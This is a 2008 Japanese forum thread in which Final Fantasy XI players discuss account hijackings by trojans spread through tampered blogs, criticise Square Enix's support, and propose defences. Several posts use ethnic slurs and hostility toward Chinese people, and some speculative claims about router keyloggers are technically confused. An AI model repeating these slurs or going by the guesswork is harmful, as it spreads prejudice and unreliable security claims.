308 :既にその名前は使われています:2008/03/25(火) 01:25:11.33 ID:elGAe1vY
ここでの報告見てると
バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民

前、救えネの洋ゲーやってたときはGMコールとか24時間対応で
返事から行動まですぐ対処してくれてたんだけどなー
もう、そこまで力入れてないってことなのか・・・

垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし
メンテがそれの対策ならいいんだけどね
個人のデータ管理とOS側に頼るんだろうなー

309 :既にその名前は使われています:2008/03/25(火) 01:25:25.04 ID:pm+l6zsS
ここが■の岐路だな。
きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。
が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。
次世代オンゲにも人が集まるわけは無い。
業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。

310 :既にその名前は使われています:2008/03/25(火) 01:27:04.26 ID:7ZgQEQ9q
赤ハックされてないが俺もバハ鯖民だ
まぁ俺はPS2だから大丈夫だとは思うけどな…

311 :280:2008/03/25(火) 01:31:21.14 ID:mx3cOLzk
280です。まだGMきません。
このシステムもいい加減にしてほしいですね。
メンテまで@30分。
こないで終わっちゃうかなぁ。
くやしいなぁ

312 :既にその名前は使われています:2008/03/25(火) 01:32:16.79 ID:9f0lVnnD
>>311
がんばれ!泣き寝入りだけはしてほしくない!

313 :既にその名前は使われています:2008/03/25(火) 01:35:42.94 ID:yV1jINTG
ソースコード書き込まれたらアウトならwikiとか危ないと思うんだけど違うの?

314 :既にその名前は使われています:2008/03/25(火) 01:38:12.64 ID:4E2nw6wM
>>313
あってる

315 :既にその名前は使われています:2008/03/25(火) 01:38:48.39 ID:CPKgTWTl
FFのWikiでリンク先を罠サイトに書き換えられたことはあった。
今はリンクたどって飛ぶときは警告出るようになってたはず。
ジョブ別のWikiはわからん…

316 :既にその名前は使われています:2008/03/25(火) 01:40:05.02 ID:slcFTapg
wikiを見るだけで感染
ということはまったくないのだろうか?

317 :既にその名前は使われています:2008/03/25(火) 01:40:25.33 ID:9ZDfFG9H
サービスは365日24時間なのに、サポセンはお休み有。
ふしぎ

318 :既にその名前は使われています:2008/03/25(火) 01:41:28.99 ID:vHIgAKgq
フレのフレがさっきハックされた。
さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage

319 :既にその名前は使われています:2008/03/25(火) 01:44:02.30 ID:hs/jxftM
頭おかしいよ業者
逆にDoS攻撃出来ないかな

320 :既にその名前は使われています:2008/03/25(火) 01:46:17.19 ID:7Ffb97n9
>>317
仕方ない 中の人だってヒトの子だ
もし過労死なんかされたら被害者であるはずのこっちが殺人者扱いされる
てけとーなバイト雇って今以上にてけとーな対応されても困るし

321 :既にその名前は使われています:2008/03/25(火) 01:46:49.14 ID:6E0RlrkX
今回被害にあって警察いって
電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。
■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな
たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって
このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな?
金もらってサービスを受けてるのに、ろくなサポートもしねー。
何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか?
今回だけは明日はわが身だ


322 :既にその名前は使われています:2008/03/25(火) 01:47:42.14 ID:ysJWQJk7
>>320
同じ人が常時対応してるワケじゃねーだろw

323 :既にその名前は使われています:2008/03/25(火) 01:48:27.67 ID:9ZDfFG9H
今回のは結構被害者多そうな。

324 :既にその名前は使われています:2008/03/25(火) 01:48:48.23 ID:9f0lVnnD
>>321
だよなあ。いままで不正もなにもしていない
ふつーのユーザーが突然被害にあうんだもん。怖すぎるよー。
明日はわが身だ。

325 :既にその名前は使われています:2008/03/25(火) 01:52:33.09 ID:xwSNSLwB
業者はbotネット使って、DDoS攻撃してくるんじゃ?
それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。
PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?

326 :既にその名前は使われています:2008/03/25(火) 01:52:57.22 ID:4E2nw6wM
>>321
セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった

327 :既にその名前は使われています:2008/03/25(火) 01:53:31.73 ID:xwSNSLwB
>>325
PS2やPS3だorz

328 :既にその名前は使われています:2008/03/25(火) 01:53:38.76 ID:2UE3q0B9
fc2の一件から被害の報告が増えたなー
ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。
せめて公式にアナウンスして欲しいもんだ。
ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ

329 :既にその名前は使われています:2008/03/25(火) 01:54:44.80 ID:rNeX04xY
アカウントハックされてますってすぐにこないGMも糞だな。

330 :既にその名前は使われています:2008/03/25(火) 01:57:26.83 ID:wc2s+Fxx
だとしても■側が出来るレベル、やって当然のレベルの対応を怠ってるってのは何度も言われてきてるんだよな。
暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。
正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、
「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。

331 :既にその名前は使われています:2008/03/25(火) 01:57:38.83 ID:CPKgTWTl
GMのまにゅあるwでアカハックの優先順位がまだ低いんじゃない?
地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて
すぐに対応するように決められると思う。
垢ハックは通常のコールと同じ優先順位の対応なんだろう。

332 :既にその名前は使われています:2008/03/25(火) 01:57:43.45 ID:slcFTapg
カスペでスキャンしたとき
ロックされてるって出る部分は安全なの?

333 :既にその名前は使われています:2008/03/25(火) 02:01:35.72 ID:zAORBuM/
住んでる地域や使用プロバイダやIPの情報を自分で登録して、そこ以外から
接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの?
ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム

334 :280:2008/03/25(火) 02:01:51.03 ID:mx3cOLzk
くそ!メンテ時間までに来なかった。
直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた!
明日も朝からGM呼んでみるか。


335 :既にその名前は使われています:2008/03/25(火) 02:02:57.84 ID:9f0lVnnD
>>334
がんばって!!

336 :既にその名前は使われています:2008/03/25(火) 02:03:03.50 ID:9ZDfFG9H
このメンテは何かの対策なのか、それとも単なる不具合の修正なのか・・・

337 :既にその名前は使われています:2008/03/25(火) 02:04:57.38 ID:9HKbKXJk
対策ならPOLもメンテ入るだろうよ
今月いっぱいシカトするなら俺もちょっと引退考えるな
ついていけない

338 :既にその名前は使われています:2008/03/25(火) 02:05:52.80 ID:QVf8SjqO
パスワード2つ発行すればいいんじゃないか?
ひとつは、いままでのIDとPASS。
もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。

緊急時には非常用のをPOL上でソフトウェア入力して使用。

あんまいみないかねー。

339 :既にその名前は使われています:2008/03/25(火) 02:07:22.07 ID:rvQA3x19
新スレ作るしかないか。■が嫌でも動かなきゃいけないくらい、いろんなとこに貼り付けるしかないな。



340 :既にその名前は使われています:2008/03/25(火) 02:10:11.67 ID:WT1MZrdK
尻鯖だけど、知り合いから聞いただけでも今日垢ハックされたの3名
多すぎないか?

341 :既にその名前は使われています:2008/03/25(火) 02:10:34.22 ID:6E0RlrkX
この2,3日はまじで「おまえらー」とかネタスレ作って遊んでる場合じゃねーよ
まじで 

342 :既にその名前は使われています:2008/03/25(火) 02:11:08.82 ID:wU4wL3FZ
>>338
あるでしょ
緊急用で発行されたもので入ると、即時アカウント凍結とか

さらにそれをHPで登録したメアド宛に発行できるといい


343 :既にその名前は使われています:2008/03/25(火) 02:12:17.77 ID:hs/jxftM
支那が喋れない様な日本語の音声認証をですね

344 :既にその名前は使われています:2008/03/25(火) 02:12:41.06 ID:9ZDfFG9H
>>338
24時間対応してるなら、あまり意味ないかもしれんが、
現状では意味あるんじゃね?

345 :既にその名前は使われています:2008/03/25(火) 02:13:41.52 ID:rvQA3x19
やばすぎだろ。ここまで、堂々とやられてるのに、何も対応しないとは、■倒産してもいいわ。


346 :既にその名前は使われています:2008/03/25(火) 02:14:18.85 ID:QVf8SjqO
>>341
【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】

347 :既にその名前は使われています:2008/03/25(火) 02:14:50.98 ID:dKvvhOTu
>>329
アカウントハックされてる奴が多すぎてその順番待ちらしいw
フレがハッキンされて3時間ほど待たされた時の一言

348 :既にその名前は使われています:2008/03/25(火) 02:15:38.30 ID:9ZDfFG9H
大問題じゃないか

349 :既にその名前は使われています:2008/03/25(火) 02:15:44.70 ID:WT1MZrdK
身近な人間がやられるまでは対岸の火事と思えるが
実際に知り合いがやられると、理不尽な相手に対する怒りと
盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する

350 :既にその名前は使われています:2008/03/25(火) 02:15:54.43 ID:/5SLOYFD
もうゲーム内での迷惑行為ではなくてリアルに犯罪だもんなあ。
犯罪で金稼ぎ。

351 :既にその名前は使われています:2008/03/25(火) 02:15:59.57 ID:b1jIPTS8
そんなファッキングされてんだwwwwwwwwwwwwww


352 :既にその名前は使われています:2008/03/25(火) 02:17:16.72 ID:auLaoDR9
競売のサイトの奴とかも怖いぜo(`д´o)

353 :既にその名前は使われています:2008/03/25(火) 02:17:26.74 ID:2UE3q0B9
よくフリーメールとかにある「パスワードを忘れて再発行する時のための秘密の質問」
みたいのはどうだろう。
ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを
変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。
今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。
それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな

354 :既にその名前は使われています:2008/03/25(火) 02:18:48.15 ID:vFPHu9Hl
GM>垢ハック被害のコール多くて頭おかしくなって死ぬ

355 :既にその名前は使われています:2008/03/25(火) 02:18:51.29 ID:rvQA3x19
すれたてしただけで、罠にはひっかからないよな・・・?

356 :既にその名前は使われています:2008/03/25(火) 02:21:29.75 ID:n1eE+/LN
サポセン体制やらさらなる対策を行うとすれば
その分のコストをどこから出すのかが問題かねぇ
月の課金額をリネ2並みにするなりしないと
株式会社としては利益を削る方向には動けないだろうし

357 :既にその名前は使われています:2008/03/25(火) 02:22:56.51 ID:9f0lVnnD
>>355
安心してスレ立てしておk。

2chがハッキングされたことってあるの?w

358 :既にその名前は使われています:2008/03/25(火) 02:24:08.74 ID:9f0lVnnD
>>356
本当にサポートやサービスが良くなるのなら
少々値上がりしても文句ないなー。

359 :既にその名前は使われています:2008/03/25(火) 02:24:24.31 ID:hpBmpOa9
アカハックされたときFFからGMコールして6時間またされたなぁ
夜間だとPOLから呼んだほうがはやいかも?

360 :既にその名前は使われています:2008/03/25(火) 02:24:39.85 ID:czdY66qa
>>357
クラックされてログが消えたことがあったかと

361 :既にその名前は使われています:2008/03/25(火) 02:25:16.82 ID:58aTjjEl
>>347
マジっすかw

有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。

スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w

362 :既にその名前は使われています:2008/03/25(火) 02:25:20.96 ID:9f0lVnnD
>>360
そうなのか!こわいなあ〜。

363 :既にその名前は使われています:2008/03/25(火) 02:26:15.59 ID:9HKbKXJk
>>357
何度かあるよ
ここ4年ほどないと思うけど

364 :既にその名前は使われています:2008/03/25(火) 02:27:39.10 ID:o+wp7W1W
>>353
悪くはないと思うが、
アレって結構ザルなんだよねぇ

誕生日や好きなヒーローとかは設定するのはいいが、
試行回数が無限だとパスワードアタックし放題

大手サイト程この傾向が多いしねぇ

365 :既にその名前は使われています:2008/03/25(火) 02:29:32.08 ID:OoZjY94u
24時間サポセンLS立ち上げました。あなたのキャラを24時間監視します。
入会金500万 携帯 メルアド 交換で緊急時もすばやくサポート。

366 :既にその名前は使われています:2008/03/25(火) 02:30:10.05 ID:bABkRSNM
>>361

> スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
> 既に信頼は地に落ちてるよ。
> 次世代MMO立ち上げても誰も付いて来ないんじゃないの?w

スクエニの対応が後手後手な感は否めないけど
開発を氏ね糞etcって連呼しながら、解約しない連中がゴロゴロしてるだけに
騒ぎが収まったら熱しやすく冷めやすい国民性と相まって、忘れて付いて行きそうだぞw

367 :既にその名前は使われています:2008/03/25(火) 02:31:45.41 ID:rNeX04xY
ゲーム離れとか色々一因あるが、FF11の数々の対応で■製品買わないって人
多いよ。

368 :既にその名前は使われています:2008/03/25(火) 02:32:14.10 ID:xwSNSLwB
POLログインの度にメール届くようにしてもいいかもな。
気分的には少し安心はできそう。
でもハックされて自宅いないときにメールきたらパニックだなw

登録しといた暗証キーみたいなのをメールすると一時的にアカウントロックもいいな。

369 :既にその名前は使われています:2008/03/25(火) 02:32:21.77 ID:zaHEJYEH
緊急メンテで垢ハックしにくくなる細工でも!?
と考えて一瞬幸せになったが2時間でこんなのどうこうできるわけもないし
第一もう対処する気ないんだろうなということを思い出したのでまたがっくり

370 :既にその名前は使われています:2008/03/25(火) 02:32:54.46 ID:jq6H0asz
何も言わずに黙っているよりはマシだろう
解約するのが一番ではあるがね

371 :既にその名前は使われています:2008/03/25(火) 02:34:01.51 ID:fAiOj5Ix
>>369
はっきりと言おう。
スクエニにそんなテクニックがあるわけがない。
それ以前にそんな手間をすすんでかけるわけがない。

372 :既にその名前は使われています:2008/03/25(火) 02:35:41.62 ID:rNeX04xY
開発期間入れると8年くらい前のだからシステム的に無理なんんじゃないかな。

373 :既にその名前は使われています:2008/03/25(火) 02:35:51.83 ID:wc2s+Fxx
タイトル:
■垢ハック大流行なのにお前らFFか■
内容:
先週末から今週頭にかけた、ここ数日の垢ハックの件数はただ事じゃない。
PS2や箱ユーザーにも被害が出るなどもはや「セキュリティは自己責任」と言ってる場合じゃない状況だ。
鯖板などにも被害者が降臨し、状況は俺たち一般ユーザーレベルの手に負えない所まで来ている。
ここらで一度■に抜本的なアカウント保護システム整備要求やヴァナ内でのシステムメッセージでの警告、
加えてRMT利用者へのBANにキャラ名を出すなどの厳しい対応を要請する事を訴える必要があるかと思う。
RMT行為とそれを行なう業者は既に犯罪行為の域であり、FFと無関係なブログの改竄など被害はゲーム外にも及んでいる。
自キャラやフレを大切に思うのならこの件について無痴でいるのはあまりに無謀すぎるのではないだろうか。

なお、セキュリティ技術などについての話題は 
●● RMT業者の垢ハックが多発している件14 ●●
http://live27.2ch.net/test/read.cgi/ogame/1206294621

こんな感じで作ってみた。■に対して声を上げたい人用。
俺は立てられなかったから誰か代理で頼む。

374 :既にその名前は使われています:2008/03/25(火) 02:35:55.23 ID:QVf8SjqO
>>365
中華RMT業者連合にIDを教え、月額払うとハックされなくなります。
さらにはRMTも快適サポート、すばやくご希望のギル、アイテムをご用意できます。
あなたも快適、安心ヴァナライフを!

375 :既にその名前は使われています:2008/03/25(火) 02:36:38.95 ID:jq6H0asz
ハックされたら、関連垢一斉ロックくらいの強硬措置取らないと
業者は痛くもかゆくも無いだろうな
つーか、トレード系は一切保証無しとか■eもアホだろ
業者にどうぞトレードでギルアイテム渡して下さいって言ってるようなもんだ

376 :既にその名前は使われています:2008/03/25(火) 02:36:50.63 ID:kqeba7Nf
FC2が対策すべきじゃないの?

377 :既にその名前は使われています:2008/03/25(火) 02:37:58.57 ID:OfQJmMS+
■も対応するべきだよな
こんなに簡単に漏れるんじゃpassの意味が全くないよね

378 :既にその名前は使われています:2008/03/25(火) 02:39:18.32 ID:9f0lVnnD
>>373
やってみたら出来たwwww
たてたぜ!ほめて!

379 :既にその名前は使われています:2008/03/25(火) 02:40:27.50 ID:wc2s+Fxx
>>378
ほう経験が生きたな
まじありがとう 最高だよ

380 :既にその名前は使われています:2008/03/25(火) 02:41:09.04 ID:9HKbKXJk
今月も凍結されたギルの総額を発表するんだろうけどそれって垢ハックで得たお金かと思うと・・

381 :既にその名前は使われています:2008/03/25(火) 02:41:55.41 ID:rNeX04xY
ネ実で注意喚起に効果的なのはスレ立てよりもななしを変更することだよ。

382 :既にその名前は使われています:2008/03/25(火) 02:42:25.86 ID:/5SLOYFD
>>378
スレ立てすごいですね

383 :既にその名前は使われています:2008/03/25(火) 02:43:16.42 ID:9f0lVnnD
それほどでもないwwwww

384 :既にその名前は使われています:2008/03/25(火) 02:45:21.90 ID:czdY66qa
謙虚だwww

385 :既にその名前は使われています:2008/03/25(火) 02:47:13.40 ID:dKvvhOTu
代々より憎き親や友人の敵とばかりに嫌っている日本人相手に
精神的ダメージを与えつつ、自らの懐も潤い
日本人の悔しがってるレスをみて中華も笑いが止まらないんだろうな
まさにざまぁwwwwwって感じなんだろうけど
ムカついてしょうがない



386 :既にその名前は使われています:2008/03/25(火) 02:48:42.80 ID:LSyEbnyY
今回の事をスルーしたらマジ終わってるな

387 :既にその名前は使われています:2008/03/25(火) 02:48:48.89 ID:9f0lVnnD
まあいまどき世界の嫌われ者なんだけどね、中国。

388 :既にその名前は使われています:2008/03/25(火) 02:51:44.92 ID:slcFTapg
あぶねーから気をつけろって話しても
全然「俺関係ねーw」って感じの人多い
こりゃアカン

389 :既にその名前は使われています:2008/03/25(火) 02:53:35.34 ID:dKvvhOTu
FC2のアドを踏んだらハッキングされた!って思うくらい
強い気持ちと自衛が欲しいところだ

390 :ハックオン・ストラトス:2008/03/25(火) 02:53:47.99 ID:auLaoDR9
狙い撃つぜっ!!o(`ω´*)o

391 :既にその名前は使われています:2008/03/25(火) 02:54:56.49 ID:9f0lVnnD
>>388
そうなんだよね。
証拠をだせって言う人もいるし。
もうちょっと危機感持ってもいいと思うんだけど。

392 :既にその名前は使われています:2008/03/25(火) 02:55:24.91 ID:dKvvhOTu
Elemenがこれやられた時FF終わるな

393 :既にその名前は使われています:2008/03/25(火) 02:56:47.60 ID:PhXDparI
うちの周りの奴らも、他人事としか思ってない
結局、そんなもんだよなぁ…

394 :既にその名前は使われています:2008/03/25(火) 02:58:31.06 ID:V2mh3qpS
アンチウィルスソフトも未だに入れてない人すらいるよ 
言っても人ごと、聞く耳なし 
自分か身内が被害にあわないと、たぶん分からないんだろうな 


395 :既にその名前は使われています:2008/03/25(火) 02:59:03.55 ID:wc2s+Fxx
だからこそ公式でのより強いアナウンスが必要なんだよ。
もしくは雑誌でセキュリティの特集組んでもらうよう働きかけるとかな。

396 :既にその名前は使われています:2008/03/25(火) 02:59:29.76 ID:fAiOj5Ix
>>388
ワームの中には自己アップデートするヤツとかある気がするし、ゲーム以外にも何らかのデータを
引き抜くアップデートもするかも知れんし処理を遅くする原因になるかもしれん。
今後 俺関係ねーw で済むかねぇ・・・

つか、自分のブログとか勝手にいじられて気持ち悪くないのかその人たちは。

397 :既にその名前は使われています:2008/03/25(火) 02:59:39.96 ID:9ZDfFG9H
elemenとか合成系とかは大丈夫なんかね・・・

398 :既にその名前は使われています:2008/03/25(火) 03:00:11.18 ID:hKaE50zj
PS2だけでやってたけどFFXIのハックに限らないから心配になってきたわ・・・

今のところkingsoftとSpybot使いながらオンラインスキャンしてる程度だけど
ノートンでも入れようかな(´Д`;)ヾ

399 :既にその名前は使われています:2008/03/25(火) 03:01:03.17 ID:wU4wL3FZ
>>394
入れても期限が切れたまま放置もいるな


400 :既にその名前は使われています:2008/03/25(火) 03:01:23.04 ID:DxM7+BBt
ネットワーク機器設定で
出荷時の初期設定が、最低限だけ許可してるものでも

「よくわからないしめんどくさいからぜんぶ許可」

ってのが多すぎて困る。
そんなことで電話すんな。マニュアル読んでください。いやほんとに頼みます。


401 :既にその名前は使われています:2008/03/25(火) 03:01:23.99 ID:o+wp7W1W
ヴァナモンがやられたぐらいだしな

ある意味公式サイトより利用度が高いelemenやられたら、
被害は予想もつかんな

402 :既にその名前は使われています:2008/03/25(火) 03:01:30.05 ID:/5SLOYFD
javaはオフにしたほうがいいよと言っても
ニコニコ見られなくなるしオンのままでいいわw
と返されたりするしね。
ほんと危機感はまるでないよ。

403 :既にその名前は使われています:2008/03/25(火) 03:01:54.82 ID:qu/cuoZy
ルーター通して感染とかあるかな?
FFやるPCはもうFF専用になってるけど別PCで踏んでるかもしれない・・

とりあえずPS2からPOLのパス変えてPG2導入してマルウェア駆除とかもやった。
それでも怖くてしょうがない・・

404 : [―{}@{}@{}-] 既にその名前は使われています:2008/03/25(火) 03:03:13.18 ID:HqnC3LpX
マイナー雑誌にFFの垢ハク記事書いた
読者受けは良くなかったかもしれない

405 :既にその名前は使われています:2008/03/25(火) 03:03:47.56 ID:QRet0Lrm
垢ハック関係のスレがこれだけ伸びまくってるのをみれば、
ユーザーの関心がどれだけ高いかわかるだろうに。

こういうことに力入れるべきだよ。
廃コンテンツ増やしてる場合じゃねえよ。

406 :既にその名前は使われています:2008/03/25(火) 03:04:04.36 ID:F65+mqFc
ヴァナモンってblogだけっしょ?
モンスのLVサーチとかするとこは問題ないんじゃねえの?

407 :既にその名前は使われています:2008/03/25(火) 03:04:07.55 ID:rvQA3x19
もうどんどん書いちゃっておk!

408 :既にその名前は使われています:2008/03/25(火) 03:04:17.73 ID:rNeX04xY
穴が開いてたら問答無用に感染したコードレッド騒動覚えてない人多いのかな?


409 :既にその名前は使われています:2008/03/25(火) 03:04:45.70 ID:KvRYpdDq
罠見つかってないblogとかサイトとか有るような気もするんだけど
調べるのも大変そうだしなぁ。
FF11関連の情報は山ほど有るからね。
さっぱり更新されていない所に張られたら、直してもらおうにも管理人さんに
連絡つかなさそうだ。

410 :既にその名前は使われています:2008/03/25(火) 03:05:46.20 ID:gG9qutBm
>>403
PS2でしかプレイしてない奴でもルーターでPCと繋いでてウィルス踏んだらアボン

411 :既にその名前は使われています:2008/03/25(火) 03:06:46.03 ID:rNeX04xY
>>398
キングソフトはうんこで有名で更にシナ製品。
AVG、AntiVir、avast!、BitDefenderとか無料のでソレよりいいのあるし、有料なら
カスペ入れとき。

412 :既にその名前は使われています:2008/03/25(火) 03:07:10.53 ID:DxM7+BBt
>>408
この時期は知らんでしょう。Nimdaすら知らん人多い。

413 :既にその名前は使われています:2008/03/25(火) 03:07:10.44 ID:9HKbKXJk
>>403
今のとこ報告はないけど可能性としてはあり

414 :既にその名前は使われています:2008/03/25(火) 03:08:22.74 ID:PhXDparI
結局、感染源を広げたのはFC2とかのブログだよな
全く見に行ってないから分からんが、公式で告知してんのかね

つか、この話題、まだ大手ニュースサイトでも取り上げられてないよな

415 :既にその名前は使われています:2008/03/25(火) 03:08:42.73 ID:jhJ+BovV
>>402
JAVAとJavaScriptは言葉使い分けような、とお約束w
まぁ両方必要が無ければきっておく事にかわりが無いが

416 :既にその名前は使われています:2008/03/25(火) 03:09:54.72 ID:rNeX04xY
>>404
珍しい奴がおるな、FF11やってたっけ?

417 :既にその名前は使われています:2008/03/25(火) 03:10:39.67 ID:9HKbKXJk
>>414
FC2が一番不気味
裏で業者から金もらってんじゃね?っておもうくらい怠慢
罠サイトの根城にもなってるしここ数日の出来事じゃないんだぜ?

418 :既にその名前は使われています:2008/03/25(火) 03:10:59.08 ID:hKaE50zj
>>411
ありがとう、とりあえずAVG入れてみるよ。


419 :既にその名前は使われています:2008/03/25(火) 03:12:01.64 ID:qxJBwIeb
>>415
確信犯とかに一々突っこむタイプ?

420 :既にその名前は使われています:2008/03/25(火) 03:12:22.89 ID:o+wp7W1W
一般ユーザにJavaとJava Scriptの使い分けを要求するのはコクだと思うわw
こんなんIT業界系だけ知ってればいいよw

■が根本対策しない(できない)なら、
まずはフレが突然いなくならないように、
注意喚起だけはしとこうぜ

421 :既にその名前は使われています:2008/03/25(火) 03:12:33.02 ID:xwSNSLwB
>>410
いろいろ突っ込みどころありそうだが
詳細希望。
コリジョンドメイン異なるのに通信傍受できるとかは言わないよね?

422 :既にその名前は使われています:2008/03/25(火) 03:14:38.32 ID:DxM7+BBt
>>414
FC2は設営者がアクセスしてきた対象のlogを
簡単に取ることが出来る仕組みを作ったから狙われているんじゃないかな?

423 : [―{}@{}@{}-] 既にその名前は使われています:2008/03/25(火) 03:14:50.25 ID:HqnC3LpX
>>416
恐らくは人違いだろうが2002年の6月からやっとる

424 :既にその名前は使われています:2008/03/25(火) 03:15:20.54 ID:qu/cuoZy
>>410 >>413
レスありがとう、なんかやる事やっても危険性があるって怖いなぁ。
最高の予防策としては怪しいURL踏まないってことなんだろうけど
いい情報載せてる有名ブログにも仕掛けられてると来たらもう何も見れなくなる・・
上にもいくつか書いてあるけど公式とかeLeMeNにしかけられたらもうどうしようもないなぁ

425 :既にその名前は使われています:2008/03/25(火) 03:16:21.11 ID:F65+mqFc
公式やられたらFF終了だなw

426 :既にその名前は使われています:2008/03/25(火) 03:17:04.37 ID:/5SLOYFD
>>415
そういうwikiとwikipedia云々みたいなのはどうでもいいんだけどなあ。
危機感もってないよねという話よ?

427 :既にその名前は使われています:2008/03/25(火) 03:18:46.04 ID:/FYPYPr8
すっげな。
オリンピック中止だが、日中の格闘で熱いな。

というわけで、マツリ上げ

428 :既にその名前は使われています:2008/03/25(火) 03:19:08.78 ID:QRet0Lrm
■としてはどうおもってるんだろうねー?

もはや、レアケースで放置できる状態でもないし、
時間が経つことで自然に改善される類の問題でもない。

なにか手を打たなきゃいけないところまではきてるのは間違いないけど、
中途半端な手を打つと、無駄なコストがかかるだけで、
下手すると余計にセキュリティホール増やすだけの結果に終わるかもしれない。

429 :既にその名前は使われています:2008/03/25(火) 03:19:15.32 ID:9HKbKXJk
>>425
公式やられたら確実に動くからそれはそれで好都合なんだがw

430 :既にその名前は使われています:2008/03/25(火) 03:22:25.37 ID:o+wp7W1W
>>421
410ではないが、
1.PC(FF未インストール)が罠サイト踏む
2.PCにトロイ仕込まれる
3.遠隔でPC→ルータをハック -> ルータにキーロガー仕込む
4.ユーザがPS2でログイン -> この時にキーロガーでパスゲッツ
5.パスを適当なサイトかメールに送信 -> ( ゚Д゚)ウマー

とかじゃねーの?
コリジョンドメインはマンション内の奴をハックしたいとかじゃねーかぎり、
関係ないと思われwww

431 :既にその名前は使われています:2008/03/25(火) 03:22:48.80 ID:gG9qutBm
>>421
俺はPS2ユーザーなんだが、先日アカハックの被害受けた
親族・友人含め誰もパスとIDを知らない
フレにも同じ状態でハックされたやつが2人いて
3人に共通することはルーターでPCも繋いでて、該当blogを踏んだこと
PS2・箱でFFやってるフレはいっぱいいるが
被害にあったのはルーターで繋いでる奴だけだから、ルーター接続も怪しいと踏んだ

432 :既にその名前は使われています:2008/03/25(火) 03:23:49.30 ID:czdY66qa
ルータにキーボードをつなぐのはレアケースかと

433 :既にその名前は使われています:2008/03/25(火) 03:23:52.43 ID:QAtiHfpn
垢ハックやった奴は死刑確定!
という世界基準でもできなければ普通のダンボールで銃の弾を防ぎ続けるような防戦一方のままだ。罪軽いから捕まっても出てくればまたやりだす。中華はRMTでもっている連中だからな。

434 :既にその名前は使われています:2008/03/25(火) 03:26:00.83 ID:QRet0Lrm
>>421
同情するよ。こんなんだからハックされるんだよな。。。

コリジョンドメインの説明とかしたくなっちゃうだろうけど、
結局、個別に全部レスしてくハメになるだろうし、
ほうっておいたほうがいいと思うよ。

435 :既にその名前は使われています:2008/03/25(火) 03:26:23.67 ID:OfQJmMS+
自分もハックされてフレも2人ハックされるってどんなんだよw
それはちかばに犯人がいるんじゃねえの?w

436 :既にその名前は使われています:2008/03/25(火) 03:26:45.55 ID:PhXDparI
ニュー速とかでスレ立つのが一番良いのかもな
ネ実だけじゃ、大手や公式が取り上げる程の騒ぎですらないんだろう

437 :既にその名前は使われています:2008/03/25(火) 03:26:52.68 ID:F65+mqFc
よくわからんがADSLの機械に直接PS2とPCぶっさしてるのだと大丈夫なんかな
ルータって無線ルータのことよね
馬鹿でスマソw

438 :既にその名前は使われています:2008/03/25(火) 03:27:01.09 ID:vHIgAKgq
>>431
PCでリンクシェルコミュだとかフレンドリスト+とか使わなかった?
俺も似た環境だから気になる。

439 :既にその名前は使われています:2008/03/25(火) 03:27:07.50 ID:gG9qutBm
>>435
爺鯖だがそんくらい多発してる

440 :既にその名前は使われています:2008/03/25(火) 03:27:54.09 ID:/5SLOYFD
>>430
ルーターに仕込むのではなくてあくま仕込むのはPC。
PCからルーターを監視して、PS2など他の機器からルーターに流れるデータを拾って送信。
感染したPCと同時に起動してなければ大丈夫。
という話ではなかったかな。

441 :既にその名前は使われています:2008/03/25(火) 03:28:08.71 ID:o+wp7W1W
>>432
レアケースだと思うが、
それがハックと何か関係あるのか?www

ルータのハックは遠隔で行うんだぞ?

442 :既にその名前は使われています:2008/03/25(火) 03:28:17.51 ID:OfQJmMS+
>>439
まじかよ
こえええええ

443 :既にその名前は使われています:2008/03/25(火) 03:28:22.15 ID:DxM7+BBt
>>430
>3.遠隔でPC→ルータをハック -> ルータにキーロガー仕込む
>4..ユーザがPS2でログイン -> この時にキーロガーでパスゲッツ

だうと。キーロガーはコンソールからの入力を

>5.パスを適当なサイトかメールに送信 -> ( ゚Д゚)ウマー

ルータがメール送受信言語話せるのかな?

